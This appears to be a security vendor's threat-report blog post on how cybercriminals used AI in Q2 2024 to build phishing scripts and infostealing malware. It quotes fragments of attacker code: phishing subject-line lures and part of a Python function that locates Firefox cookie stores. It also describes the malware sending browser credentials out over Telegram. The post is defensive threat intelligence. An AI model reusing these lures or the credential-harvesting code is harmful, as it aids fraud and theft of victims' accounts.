Security operations · 3 MIN READ · AARON WALTON · JUL 23, 2024 · TAGS: AI / MDR
TL;DR
This is a summary of what you’ll find in each blog in this series:
- Volume I: Q2 by the numbers. We’ll look at an overview of incidents and which attack types are trending. This is a summary of all the volumes for this quarter.
- ➡️ Volume II: Attackers advance with AI. In many cases, attackers use AI in place of the skills they don’t have or to augment their existing capabilities. We share examples and insights from attacks we’ve seen against our own customer base.
- Volume III: Malware infection trends. We discuss what types of malware appear to be trending (spoiler alert: it’s Remote Access Trojans [RATs]) and long-time threats that don’t appear to be going away anytime soon.
- Volume IV: Phishing trends. Phishing-as-a-Service (PhaaS) platforms make phishing easy. These services really took off in the last year and a half and show no sign of stopping. We share what these are, how they work, and how they can be counteracted.
- Volume V: Latent-risk infostealing malware. Infostealers present a serious risk to businesses. We examine recent notable breaches involving infostealers, highlighting the importance of being able to detect, mitigate, and respond to this form of malware.
Since the introduction of easily accessible AI last year, the subsequent widespread adoption has many people—both in and outside the cybersecurity community—concerned about the security implications. In February, Microsoft and OpenAI published findings of nation-state-aligned actors using AI to advance toward their goals. However, we haven’t seen much discussion about how cybercriminals actually use AI beyond theoretical examples. This quarter, we started seeing more concrete examples of cybercriminals leveraging AI for phishing and information stealing malware.
Here are some noteworthy examples.
AI-aided phishing
In June, we wrote about an instance where an attacker appeared to leverage an AI-written script to run their phishing campaign. The (seemingly inexperienced) attacker accidentally attached their script to phishing emails instead of the intended phishing attachment. From our review of the script, we believe it was AI-generated because its style and frequency were consistent with other AI-generated code samples.
The script, while fairly simple, was pretty effective. It was built to leverage Brevo’s API (formerly SendInBlue) to send emails. The only input required by the user was a list of email addresses. With that list, the script would extract the user’s domain and put it in the subject line with random numbers. While it wasn’t particularly sophisticated, these are small features that can help phishing emails be more targeted and harder for defenders to automatically identify and remove.
subjects = [
“[DOMC]: ACH Deposit Completed for your Invoice – 29,300USD”,
“[DOMC]: Notification of EFT Remittance”,
“[DOMC]: EFT Payment Advice”,
“[DOMC]: Payment Notification from vendor”,
“[DOMC]: ACH Payment Advice Note 05/16 -“,
“[DOMC]: Remittance Advice attached – ID”
]
# Preset name for the attachment
preset_attachment_name = “Remittance_DOMC.html
AI-aided infostealers
Attackers are also leveraging AI to generate infostealing malware. In one instance, our SOC team saw a bad actor create an executable file to drop a copy of Python and a Python script. The writing style and language in some sections of the script differs substantially from the rest, indicating the malware developer likely used AI to write the code. (In these AI-generated portions, the AI consistently follows the PEP8 style guide for Python and uses comments but the rest of the code does not.)
The AI-generated portions of the code identify the location of installed browsers and load the database, containing passwords, cookies, and credit card numbers (i.e., the main infostealing capability of the malware). The attacker supplied their own code for decrypting any content and then leveraged the AI to write the exfiltration method. The exfiltration itself is performed using Telegram’s API.
The malware appears to be written by a Vietnamese developer. The code contains AI-generated comments in both Vietnamese and English. Like other information stealing malware from Vietnam, the malware specifically looks for Facebook Business accounts and excludes targets based in Vietnam. If a victim is in Vietnam, it only sends the attacker a message via Telegram saying: “Tool is blocked in Vietnam!” ( “Tool bị chặn tại Việt Nam!” in Vietnamese).
def base_firefox_getCookies(path, cookies_file=’cookies.sqlite’):
path_cookies = os.path.join(path, cookies_file)
# Check if file exist
if not os.path.exists(path_cookies):
conn = sqlite3.connect(path_cookies)
cursor = conn.cursor()
[…]
# Định nghĩa các biến tương ứng
default_appdata = os.path.expandvars(“%APPDATA%”)
local_appdata = os.path.expandvars(“%LOCALAPPDATA%”)
The examples outlined here are important because they highlight that attackers are using AI to generate code and programs in ways similar to defenders—offering a behind-the-scenes look at attacker behavior we don’t often get on the defender side.
Next up in this series: malware trends.
Questions? Just want to chat? Drop us a line.
About these reports
The trends described in our QTRs are based on incidents our security operations center (SOC) identified through investigations into alerts, email submissions, or threat hunting leads in the second quarter (Q2) of 2024. We analyzed incidents across our customer base, which includes organizations of all sizes, in many industries, and with differing security maturity levels. In the process, we sought patterns and attacker tendencies to help guide strategic decision-making and operational processes for your team.